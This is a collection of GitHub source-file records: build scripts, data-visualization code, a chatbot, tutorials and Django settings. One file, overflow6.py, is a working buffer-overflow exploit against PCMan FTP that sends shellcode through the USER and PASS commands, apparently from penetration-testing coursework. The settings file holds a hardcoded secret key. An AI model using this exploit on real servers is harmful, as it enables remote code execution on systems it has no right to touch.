c1fe45b3e7445a6563381aa858ccbee35fc7fb33 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2007/programming/languages/perl/XML-SAX/actions.py | 5573fe066768c8ff99b6aad789159fe54b90d0fb | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2006 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
from pisi.actionsapi import pisitools
from pisi.actionsapi import perlmodules
def setup():
perlmodules.configure()
def build():
perlmodules.make()
def install():
perlmodules.install()
| [
"[email protected]"
] | |
5506ea8b1391d5f1fe1433f57984e88db7e43cfe | fb617db1881e6ece6f606a3598124966a9b0b070 | /Edge.py | 92c895fc165e0ee8b6a5bac43923ab1ab8b5dd13 | [] | no_license | sitdsa/dsa | 21bf8a4322f205a5440e06325d12dece10f42bbe | 6178be6260dfe4f8444442eee7e7e3d6f0936c25 | refs/heads/master | 2020-12-23T14:59:00.491782 | 2020-03-09T02:46:58 | 2020-03-09T02:46:58 | 237,184,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | __author__ = 'A88253'
class Edge:
v = None # vertex 1
w = None # vertex 2
weight = None # weight
def __init__(self, v, w, wt):
self.v = v
self.w = w
self.weight = wt
# return either endpoint
def either(self):
return self.v
# return the other endpoint
def other(self, v):
if v==self.v:
return self.w
else:
return self.v
def __lt__(self, other):
return self.weight < other.weight
def __gt__(self, other):
return self.weight > other.weight
def __ge__(self, other):
return self.weight >= other.weight
def __le__(self, other):
return self.weight <= other.weight
def __eq__(self, other):
return self.weight == other.weight
def toString(self):
return str(self.v) + "-" + \
str(self.w) + " " + \
str(self.weight)
| [
"[email protected]"
] | |
e857df597344383399adbd6dd4701f5cb1a0d7af | 0e31e5f780915fc505d09655fcd4a2915e587402 | /DC visualization(2d to 4d).py | 2f9ba911dc683f9aae65f72df5247349eb7cee66 | [] | no_license | MohibAyub/Forest-Fire-Analysis-and-Prediction | f764f9f83021bff7055551934e1e0ea9516924d7 | 7cfab9470d16b4b97506e790a8b6472db6e36880 | refs/heads/master | 2021-10-20T04:25:05.372918 | 2019-02-25T22:04:04 | 2019-02-25T22:04:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,726 | py | '''
@author: Kunmao Li
1. new varaible generated:
1). ln(area+1): float64
Based on the characteristics of variable 'area' from the plots, remodel 'area' with logarithm transform
2). FIRE: str
Fire indicator: fire/no fire ,indicating whether there's fire
2. 1D Visualization
Figure 1-13: 13 varaibles inside the dataset
Figure 14: 1 new varible ln(area+1) generated
For every figure, 3 plots generated:
Univariate Histogram: x-axis: the variable itself ; y-axis: the freqeuncy/times of the data
Kernel Density Estimation: x-axis: the variable itself; y-axis:the probability density of the variable estimated
Single Parameter Distribution: the combination of above two plots for better observation with classification and comparison
3. 2D Visualization(DMC & temp/RH/rain)
Figure 15: pairplots(diagonal:the kernel density estimation; non-diagonal: scatter plots with linear regression line given)
also, the data has been classified according to variable 'FIRE' and displayed green when no fire and red when on fire
Figure 16: pairplots(diagonal: single variable distribution; non-diagonal: kernel density plots of two variables)
Figure 17-20: more complicated, detailed and advanced plots given:
kde plots: demonstrate the density distribution between two variables with color change according to the color palatte set
scatter plots: spot the data easily
axis: also display the distribution line of each variable with different color
color bar: relate the color shade/range with data values for identifying the level of density
4. 3D Visualization(DMC & any two from temp,RH,rain)
Figure 21-23:histograms: x,y-axis: any two from temp,RH,rain; z-axis: DMC
classify the histograms by variable 'FIRE': (red histograms:fire; green histograms:no fire)
5. 4D Visualization
Figrue 24Realize the 4-th dimension by marking the histograms with different colors based on the interval values of DMC
x,y,z-axis: temp,RH,rain
'''
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
import numpy as np
import scipy.io as sio
from mpl_toolkits.mplot3d import Axes3D
fire = pd.read_csv('http://archive.ics.uci.edu/ml/machine-learning-databases/forest-fires/forestfires.csv')
fire.month=fire.month.map({'jan':1,'feb':2,'mar':3,'apr':4,'may':5,'jun':6,'jul':7,'aug':8,'sep':9,'oct':10,'nov':11,'dec':12})
fire.day=fire.day.map({'mon':1,'tue':2,'wed':3,'thu':4,'fri':5,'sat':6,'sun':7})
data=pd.DataFrame(fire,columns=['X','Y','month','day','FFMC','DMC','DC','ISI','temp','RH','wind','rain','area'])
'''
1D: Univariate Histograms,Kernel Density Estimation and Single Parameter Distribution
'''
n=1
for i in ['X','Y','month','day','FFMC','DMC','DC','ISI','temp','RH','wind','rain','area']:
plt.figure(n)
plt.subplot(131)# Univariate Histograms
plt.title('Univariate Histogram', fontsize=14, position=(0.5,1.05))
plt.ylabel('Frequency')
sns.distplot(fire[i],kde=False,color='r',rug=True)
plt.subplot(132) # Kernel Density Estimation
plt.title('Kernel Density Estimation', fontsize=14, position=(0.5,1.05))
plt.ylabel('Probability')
sns.distplot(fire[i],hist=False,color='g',kde_kws={'shade':True})
plt.subplot(133) # Single Parameter Distribution
plt.title('Single Parameter Distribution', fontsize=14, position=(0.5,1.05))
plt.ylabel('Probability')
sns.distplot(fire[i],color='m')
n += 1
'''
According to the above three plots of 'area' in figure 13, the parameter is pretty distorted towards 0.0
Thus using logrithm transform ln(area+1) to remodel 'area' and generate the new varibale 'ln(area+1)'
'''
fire['ln(area+1)']=np.log(fire['area']+1)
plt.figure(14)
plt.subplot(131)# Univariate Histograms
plt.title('Univariate Histogram', fontsize=14, position=(0.5,1.05))
plt.xlabel('ln(area+1)')
plt.ylabel('Frequency')
sns.distplot(fire['ln(area+1)'],kde=False,color='r',rug=True)
plt.subplot(132) #Kernel Density Estimation
plt.title('Kernel Density Estimation', fontsize=14, position=(0.5,1.05))
plt.ylabel('Probability')
plt.xlabel('ln(area+1)')
sns.distplot(fire['ln(area+1)'],hist=False,color='g',kde_kws={'shade':True})
plt.subplot(133) # Single Parameter Distribution
plt.title('Single Parameter Distribution', fontsize=14, position=(0.5,1.05))
plt.ylabel('Probability')
plt.xlabel('ln(area+1)')
sns.distplot(fire['ln(area+1)'],color='m')
'''
Based on the forest Fire Weather Index system, DMC is influenced by temperature(temp), reletive humidity(RH) and rain
To clarify the correlation between DMC and the rest variables initially, create the pairplots.
figure 15: 16 pairplots totally
:4 Diagonal plots: kde plots indicating the probability density of the variable
:14 Non-Diagonal plots: scatter diagrams with linear regression line generated
p.s.: for better visualization, adding variable'FIRE',which indicates 'fire' or 'no fire'
and mark the data values with two colors(red for fire;green for no fire)
figrue 16: 16 pairplots totally
:4 Diagonal plots: single paramter distribution
:14 Non-Diagonal plots: kdeplots of two variables(the core indicates the highest density)
'''
plt.figure(15)
df1=pd.DataFrame(fire,columns=['DMC','temp','RH','rain','ln(area+1)'])
# set [ln(area+1)>0]=1 ; [ln(area+1)=0]=0
df1['FIRE'] = np.where(df1['ln(area+1)']>0, 'fire', 'no fire')
sns.pairplot(df1,vars=['DMC','temp','RH','rain'],kind='reg',hue='FIRE',palette='hls',markers=["o", "x"])
plt.show()
plt.figure(16)
g = sns.PairGrid(df1)
g.map_diag(sns.kdeplot)
g.map_offdiag(sns.kdeplot,cmap="Blues_d",n_levels=20)
plt.show()
'''
2D:
figure 17: DMC-temp & DMC-RH & DMC-rain
figure 18-20: DMC-temp / RH / rain
p.s.: for the plots related to rain, for better observation, adjustment is needed since scatters were initially distributed around 0.00
'''
plt.figure(17)
sub=131
for i in ['temp','RH','rain']:
plt.subplot(sub)
plt.title('DMC-'+i, fontsize=14, position=(0.5,1.05))
sns.kdeplot(df1[i],df1['DMC'], # demonstrate the probability distribution of two variables
cbar = True, # display color bar
shade = True, # display shades
cmap = 'Reds', # set the color palatte
shade_lowest=False, # not display periphery color/shade
n_levels = 40 # number of curves, the higher, the smoother
)# the color change indicates the change of density
plt.grid(linestyle = '--')
plt.scatter(df1[i], df1['DMC'], s=5, alpha = 0.5, color = 'k', marker='+') #scatter
sns.rugplot(df1[i], color='g', axis='x',alpha = 0.5)
sns.rugplot(df1['DMC'], color='r', axis='y',alpha = 0.5)
sub += 1
plt.show()
plt.figure(18) # DMC-temp
plt.title('DMC-temp', fontsize=14, position=(0.5,1.05))
pal=sns.cubehelix_palette(8, gamma=2,as_cmap=True)
sns.kdeplot(df1['temp'],df1['DMC'],cbar = True,shade = True,cmap = pal,shade_lowest=False,n_levels = 40)
plt.grid(linestyle = '--')
plt.scatter(df1['temp'], df1['DMC'], s=5, alpha = 0.5, color = 'k', marker='+') #scatter
sns.rugplot(df1['temp'], color="orange", axis='x',alpha = 0.5)
sns.rugplot(df1['DMC'], color="purple", axis='y',alpha = 0.5)
plt.show()
plt.figure(19) # DMC-RH
plt.title('DMC-RH', fontsize=14, position=(0.5,1.05))
pal=sns.cubehelix_palette(8, start=.5, rot=-.75,as_cmap=True)
sns.kdeplot(df1['RH'],df1['DMC'],cbar = True,shade = True,cmap = pal,shade_lowest=False,n_levels = 40)
plt.grid(linestyle = '--')
plt.scatter(df1['RH'], df1['DMC'], s=5, alpha = 0.5, color = 'k', marker='+') #scatter
sns.rugplot(df1['RH'], color="blue", axis='x',alpha = 0.5)
sns.rugplot(df1['DMC'], color="green", axis='y',alpha = 0.5)
plt.figure(20) # DMC-rain
plt.title('DMC-rain', fontsize=14, position=(0.5,1.05))
sns.kdeplot(df1['rain'],df1['DMC'],cbar = True,shade = True,cmap = 'Purples',shade_lowest=False,n_levels = 40)
plt.grid(linestyle = '--')
plt.scatter(df1['rain'], df1['DMC'], s=5, alpha = 0.5, color = 'k', marker='+') #scatter
sns.rugplot(df1['rain'], color="orange", axis='x',alpha = 0.5)
sns.rugplot(df1['DMC'], color="purple", axis='y',alpha = 0.5)
plt.show()
fig1=plt.figure(21)
ax = fig1.add_subplot(111, projection='3d')
x,y,z = np.array(fire['temp']),np.array(fire['rain']),np.array(fire['DMC'])
x = x.flatten('F')
y = y.flatten('F')
'''
mark the bars with two colors for better observation
red: fire
green: no fire
'''
q=df1['FIRE']
C = []
for a in q:
if a == 'fire':
C.append('red')
else:
C.append('green')
dx = 0.6 * np.ones_like(x) # set the width of the histograms, the constant can be adjusted based on observation of plots
dy = 0.2 * np.ones_like(y)
dz = abs(z) * z.flatten()
dz = dz.flatten() / abs(z)
z = np.zeros_like(z)
ax.set_title('temp-rain-DMC')
ax.set_xlabel('temp')
ax.set_ylabel('rain')
ax.set_zlabel('RH')
plt.axis([0,35,-6,6])#set the interval of axises to move the bunch of histograms to the centeral area for better observation
ax.bar3d(x, y, z, dx, dy, dz, color=C, zsort='average')
fig2=plt.figure(22)
ax = fig2.add_subplot(111, projection='3d')
x,y,z = np.array(fire['temp']),np.array(fire['RH']),np.array(fire['DMC'])
x = x.flatten('F')
y = y.flatten('F')
dx = 0.6 * np.ones_like(x)# set the width of the histograms, the constant can be adjusted based on observation of plots
dy = 0.2 * np.ones_like(y)
dz = abs(z) * z.flatten()
dz = dz.flatten() / abs(z)
z = np.zeros_like(z)
ax.set_title('temp-RH-DMC')
ax.set_xlabel('temp')
ax.set_ylabel('RH')
ax.set_zlabel('DMC')
ax.bar3d(x, y, z, dx, dy, dz, color=C, zsort='average')
fig3=plt.figure(23)
ax = fig3.add_subplot(111, projection='3d')
x,y,z = np.array(fire['rain']),np.array(fire['RH']),np.array(fire['DMC'])
x = x.flatten('F')
y = y.flatten('F')
dx = 0.1 * np.ones_like(x)# set the width of the histograms, the constant can be adjusted based on observation of plots
dy = 0.2 * np.ones_like(y)
dz = abs(z) * z.flatten()
dz = dz.flatten() / abs(z)
z = np.zeros_like(z)
ax.set_title('rain-RH-DMC')
ax.set_xlabel('rain')
ax.set_ylabel('RH')
ax.set_zlabel('DMC')
plt.axis([-6,6,20,100]) #set the interval of axises to move the bunch of histograms to the centeral area for better observation
ax.bar3d(x, y, z, dx, dy, dz, color=C, zsort='average')
plt.show()
'''
4D:
axies:x: temp y:rain z:RH
4th demension: DMC
displaying DMC by mark the bars with different colors based on the value intervals of DMC
'''
fig = plt.figure(24)
ax = fig.add_subplot(111, projection='3d')
x,y,z = np.array(fire['temp']),np.array(fire['rain']),np.array(fire['RH'])
x = x.flatten('F')
y = y.flatten('F')
# Based on the interval values of DMC, mark the histograms with different colors
q=fire['DMC']
C = [] # the list serving as the color palatte
for a in q:
if a < 50:
C.append('orange') # for data from DMC <50, mark it with orange
elif a < 100:
C.append('blue') # for data from DMC belonging to [50,100), mark it with blue
elif a < 150:
C.append('purple') # for data from DMC belonging to [100,150), mark it with purple
elif a < 200:
C.append('red') # for data from DMC belonging to [150,200), mark it with red
elif a > 200:
C.append('green') # for data from DMC >200, mark it with greem
#dx,dy,dz:length width altitude
dx = 0.6 * np.ones_like(x)# set the width of the bars, the constant can be adjusted based on observation of plots
dy = 0.2 * np.ones_like(y)
dz = abs(z) * z.flatten()
dz = dz.flatten() / abs(z)
z = np.zeros_like(z)
ax.set_title('DMC-temp-rain-RH')
ax.set_xlabel('temp')
ax.set_ylabel('rain')
ax.set_zlabel('RH')
plt.axis([0,35,-6,6])#set the interval of axises to move the bunch of histograms to the centeral area for better observation
ax.bar3d(x, y, z, dx, dy, dz, color=C, zsort='average')
plt.show()
| [
"[email protected]"
] | |
a8cff99d9cc16ff3c36e4d240156337d618ee0da | 15b45026f39eeb213c9b33b59e79791381b1f24e | /1. ChatBot.py | 0856ca8e380b04f65517dd4fff650453b80058fe | [] | no_license | Afatirk/Robokalaam-Assignment | 51bacea5d8ed5c25998daf323500cb13e284a275 | 1d7cedbae3c257316ba64e52c46781d2827c0852 | refs/heads/main | 2023-01-15T13:44:57.056496 | 2020-11-23T08:17:29 | 2020-11-23T08:17:29 | 315,239,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | from nltk.chat.util import Chat, reflections
pairs=[['My name is (.*)',['Hi %1']],
['(.*) is your name?',['My name is JARVIS The Robot!']],
['(Hi|Hello|Heyy|hey)',['Hey there','Hi','Hellooo','Hello, nice to meet you']],
['(.*) created you?',['Abdul Fatir Sir did']],
['How is the weather in (.*)',['The weather is Good in %1']],
['(.*) help (.*)',['I can help you']]]
chat=Chat(pairs, reflections)
chat.converse()
| [
"[email protected]"
] | |
40d746d219cf27e2d4c05238491115c46a3beb00 | 092788f4b12d733abff65eb587d9d7369765c6e5 | /buffer_overflow/pcman_ftp/overflow6.py | 303ce83da42395345f64626fc0050d4789c2af68 | [] | no_license | shajd/PTP | 679a5921fe81dac0bb574cd0983045a7c827fbb3 | 52011adb7c507e376d98c4eab1f4ecaf0037ff6a | refs/heads/master | 2022-11-06T14:41:41.288177 | 2020-06-18T04:41:14 | 2020-06-18T04:41:14 | 269,221,192 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,022 | py | #!/usr/bin/env python2
import socket
import struct
# set up the IP and port we're connecting to
RHOST = "10.0.2.8"
RPORT = 21
buf_totlen = 2500
offset_srp = 2007
ptr_jmp_esp = 0x7c9d30d7
sub_esp_10 = "\x83\xec\x10"
shellcode_calc = ""
shellcode_calc += "\xb8\xa2\xf0\x26\x08\xd9\xcd\xd9\x74\x24"
shellcode_calc += "\xf4\x5a\x31\xc9\xb1\x31\x31\x42\x13\x83"
shellcode_calc += "\xc2\x04\x03\x42\xad\x12\xd3\xf4\x59\x50"
shellcode_calc += "\x1c\x05\x99\x35\x94\xe0\xa8\x75\xc2\x61"
shellcode_calc += "\x9a\x45\x80\x24\x16\x2d\xc4\xdc\xad\x43"
shellcode_calc += "\xc1\xd3\x06\xe9\x37\xdd\x97\x42\x0b\x7c"
shellcode_calc += "\x1b\x99\x58\x5e\x22\x52\xad\x9f\x63\x8f"
shellcode_calc += "\x5c\xcd\x3c\xdb\xf3\xe2\x49\x91\xcf\x89"
shellcode_calc += "\x01\x37\x48\x6d\xd1\x36\x79\x20\x6a\x61"
shellcode_calc += "\x59\xc2\xbf\x19\xd0\xdc\xdc\x24\xaa\x57"
shellcode_calc += "\x16\xd2\x2d\xbe\x67\x1b\x81\xff\x48\xee"
shellcode_calc += "\xdb\x38\x6e\x11\xae\x30\x8d\xac\xa9\x86"
shellcode_calc += "\xec\x6a\x3f\x1d\x56\xf8\xe7\xf9\x67\x2d"
shellcode_calc += "\x71\x89\x6b\x9a\xf5\xd5\x6f\x1d\xd9\x6d"
shellcode_calc += "\x8b\x96\xdc\xa1\x1a\xec\xfa\x65\x47\xb6"
shellcode_calc += "\x63\x3f\x2d\x19\x9b\x5f\x8e\xc6\x39\x2b"
shellcode_calc += "\x22\x12\x30\x76\x28\xe5\xc6\x0c\x1e\xe5"
shellcode_calc += "\xd8\x0e\x0e\x8e\xe9\x85\xc1\xc9\xf5\x4f"
shellcode_calc += "\xa6\x36\x14\x5a\xd2\xde\x81\x0f\x5f\x83"
shellcode_calc += "\x31\xfa\xa3\xba\xb1\x0f\x5b\x39\xa9\x65"
shellcode_calc += "\x5e\x05\x6d\x95\x12\x16\x18\x99\x81\x17"
shellcode_calc += "\x09\xfa\x44\x84\xd1\xd3\xe3\x2c\x73\x2c"
# build a message followed by a newline
buf = ""
buf += "A"*(offset_srp - len(buf))
buf += struct.pack("<I", ptr_jmp_esp)
buf += "BBBB"
buf += sub_esp_10
buf += shellcode_calc
buf += "D"*(buf_totlen - len(buf))
# send the message
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((RHOST, RPORT))
s.recv(1024)
s.send('USER ' + buf + '\r\n')
s.recv(1024)
s.send('PASS ' + buf + '\r\n')
s.send('QUIT\r\n')
s.close()
| [
"[email protected]"
] | |
d8c24a8144ffcbf9c5ef4a88235c206f31add117 | e87e8dace1d4a19068142d2b3ceff54db6fbad00 | /Python3.8/1040 - Average 3 | 4fd3722eaa7ff858439cbea8a4d7063b1c2271f9 | [] | no_license | ferdousmamun777/Uri-Solution | aab8ce64f58fd0df59fa6e4dd224f7665d1dd865 | f17f704cc7a9a4ad1b4f1e03e68c03ceda52693e | refs/heads/master | 2022-12-01T17:08:46.740555 | 2020-08-10T14:14:25 | 2020-08-10T14:14:25 | 283,682,526 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | n1, n2, n3, n4= input().split()
n1 = float(n1)
n2 = float(n2)
n3 = float(n3)
n4 = float(n4)
media = (n1*2+n2*3+n3*4+n4*1)/10
print('Media: %.1f' %media)
if (media>=7):
print('Aluno aprovado.')
elif(media<5):
print('Aluno reprovado.')
else:
print('Aluno em exame.')
n5 = float(input())
final = (n5+media)/2
print('Nota do exame:', n5)
if (n5>=5):
print('Aluno aprovado.')
print('Media final: %.1f' %final)
else:
print('Aluno reprovado.')
print('Media final: %.1f' % final)
| [
"[email protected]"
] | ||
226640c569bd1ca4c69bbf3aaacc75aeb08d09a6 | c98f9d1254996058586011d24e12f03645963185 | /union, intersection, difference and symmetric difference.py | 4cb4524e8d1bdc9675a8337aa1b29bfda65d060b | [] | no_license | Thamaraikannan-R/set | 8db9e1005ff25a8a69e3ab8cf4788b9768a852f5 | 63cacb5fb0ab678861b939600410391e9de92328 | refs/heads/master | 2020-04-10T04:41:54.813924 | 2018-12-07T10:04:25 | 2018-12-07T10:04:25 | 160,806,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | a = {0, 2, 4, 6, 8}
b = {1, 2, 3, 4, 5}
print("A+B",a.union(b))
print("A and B",a.intersection(b))
print("A-B",a.difference(b))
print("A not B",a.symmetric_difference(b)) | [
"[email protected]"
] | |
6ddae08c21df8c42e44f5e6d4404af25f79849a0 | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/python_all/64_2.py | 5b45ab1e95ee997b47876fb571f3e9db42c2eeed | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,023 | py | Python program to print Calendar without calendar or datetime module
Given the month and year. The task is to show the calendar of that month and
in the given year without using any module or pre-defined functions.
**Examples:**
**Input :**
mm(1-12) :9
yy :2010
**Output :**
September 2010
Su Mo Tu We Th Fr Sa
01 02 03 04
05 06 07 08 09 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30
**Approach:**
In the program below, we first calculate the number of odd days to find the
day of the date 01-mm-yyyy.Then, we take in the year(yy) and the month(mm) as
input and displays the calendar for that month of the year.
Below is the implementation of the given approach.
__
__
__
__
__
__
__
# Python code to print Calendar
# Without use of Calendar module
mm = 2
yy = 2020
month ={1:'January', 2:'February', 3:'March',
4:'April', 5:'May', 6:'June', 7:'July',
8:'August', 9:'September', 10:'October',
11:'November', 12:'December'}
# code below for calculation of odd days
day =(yy-1)% 400
day = (day//100)*5 + ((day % 100) - (day %
100)//4) + ((day % 100)//4)*2
day = day % 7
nly =[31, 28, 31, 30, 31, 30,
31, 31, 30, 31, 30, 31]
ly =[31, 29, 31, 30, 31, 30,
31, 31, 30, 31, 30, 31]
s = 0
if yy % 4 == 0:
for i in range(mm-1):
s+= ly[i]
else:
for i in range(mm-1):
s+= nly[i]
day += s % 7
day = day % 7
# variable used for white space filling
# where date not present
space =''
space = space.rjust(2, ' ')
# code below is to print the calendar
print(month[mm], yy)
print('Su', 'Mo', 'Tu', 'We', 'Th', 'Fr',
'Sa')
if mm == 9 or mm == 4 or mm == 6 or mm
== 11:
for i in range(31 + day):
if i<= day:
print(space, end =' ')
else:
print("{:02d}".format(i-day), end =' ')
if (i + 1)% 7 == 0:
print()
elif mm == 2:
if yy % 4 == 0:
p = 30
else:
p = 29
for i in range(p + day):
if i<= day:
print(space, end =' ')
else:
print("{:02d}".format(i-day), end =' ')
if (i + 1)% 7 == 0:
print()
else:
for i in range(32 + day):
if i<= day:
print(space, end =' ')
else:
print("{:02d}".format(i-day), end =' ')
if (i + 1)% 7 == 0:
print()
---
__
__
**Output:**
February 2020
Su Mo Tu We Th Fr Sa
01
02 03 04 05 06 07 08
09 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
| [
"[email protected]"
] | |
2daf44495a441ace02532763735623f396e93e8f | 62658c46951492bb3e19f7ea25be2c2ee56fa66e | /gps.py | 40d783cceeb9b0de9d0a40923b6d49d0b0494604 | [] | no_license | nishishah/IngeniousHackathon_CodeO-Sapiens | f491cbaa3aced31186d92748402dd43eb7c3ef2c | 51a266ac4b2c4affbd058656583d4f800100732b | refs/heads/master | 2021-01-25T14:16:32.205585 | 2018-03-04T04:34:01 | 2018-03-04T04:34:01 | 123,676,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | import time
import serial
import string
import pynmea2
import RPi
GPIO as gpio
# to add the LCD library
import Adafruit_CharLCD as LCD
gpio.setmode(gpio.BCM)
# declaring LCD pins
lcd_rs = 17
lcd_en = 18
lcd_d4 = 27
lcd_d5 = 22
lcd_d6 = 23
lcd_d7 = 10
lcd_backlight = 2
lcd_columns = 16 # Lcd column
lcd_rows = 2 # number of LCD rows
lcd = LCD.Adafruit_CharLCD(
lcd=LCD.Adafruit_CharLCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7, lcd_columns, lcd_rows, lcd_backlight)
port = "/dev/ttyAMA0" # the serial port to which the pi is connected.
# create a serial object
ser = serial.Serial(port, baudrate=9600, timeout=0.5)
while 1:
try:
data = ser.readline()
except:
print("loading")
# wait for the serial port to churn out data
if data[0:6] == '$GPGGA': # the long and lat data are always contained in the GPGGA string of the NMEA data
msg = pynmea2.parse(data)
# parse the latitude and print
latval = msg.lat
concatlat = "lat:" + str(latval)
print
concatlat
lcd.set_cursor(0, 0)
lcd.message(concatlat)
# parse the longitude and print
longval = msg.lon
concatlong = "long:" + str(longval)
print
concatlong
lcd.set_cursor(0, 1)
lcd.message(concatlong)
time.sleep(0.5) # wait a little before picking the next data.
| [
"[email protected]"
] | |
c84ddf4da41f9c2db08ce89ab29e9bf4167f1205 | 11952e488001f2adf55fdf65cba35d3e74990bdd | /settings.py | ee42ac8a378aaa7ad885d1fb40b3bfbcf1b9e349 | [] | no_license | JustNikhill/Website-using-Django | 4bd029132f1ac848b82a6ba731c6155e4641fc0e | a93b2bce26d5d39efd86bd96f8d3d57356b0638b | refs/heads/main | 2023-04-23T22:05:28.244070 | 2021-05-02T16:04:52 | 2021-05-02T16:04:52 | 359,555,675 | 12 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,218 | py | """
Django settings for pyshop project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'uyczef5p@!3z_w2=i0_xsdq)$-m+5pe#hk0u4e!3nt&1@%16g4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'products.apps.ProductsConfig'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pyshop.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pyshop.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
243b00fb792df0d908725a77d369f7a886e958ca | 7319bdc1aa1edd9e37424da47264882753dda919 | /monitor_nomina.py | fde617e7fa6aa3fb079d6c0dc9c7e6ee000411ae | [] | no_license | njmube/satconnect | 4ff81ac132811d2784d82a872be34590f53021db | de421f546a6f7f4cc5f247d1b2ba91ac272bdcb9 | refs/heads/master | 2023-03-18T12:58:18.379008 | 2017-10-24T07:14:05 | 2017-10-24T07:14:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | # -*- coding: utf-8 -*-
from LibTools.filesystem import Carpeta
from slaves import SentinelNomina
import settings
if __name__ == '__main__':
carpeta = Carpeta(settings.folder_nomina)
sentinela = SentinelNomina(carpeta)
sentinela.start_Monitoring()
| [
"="
] | = |
1628b9d704c430771ffe07895f60f69d5d03c21c | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nntwelv.py | 4e1af148e299d47bb87a0be2b829ebcc80cee86d | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 2,600 | py | ii = [('CookGHP3.py', 8), ('LyelCPG2.py', 4), ('MarrFDI.py', 2), ('RogePAV2.py', 11), ('CoolWHM2.py', 20), ('KembFFF.py', 1), ('GodwWSL2.py', 22), ('RogePAV.py', 4), ('SadlMLP.py', 6), ('WilbRLW.py', 15), ('WilbRLW4.py', 9), ('RennJIT.py', 15), ('ProuWCM.py', 4), ('AubePRP2.py', 28), ('CookGHP.py', 6), ('ShawHDE.py', 6), ('MartHSI2.py', 11), ('LeakWTI2.py', 19), ('UnitAI.py', 9), ('KembFJ1.py', 20), ('WilkJMC3.py', 7), ('WilbRLW5.py', 7), ('LeakWTI3.py', 18), 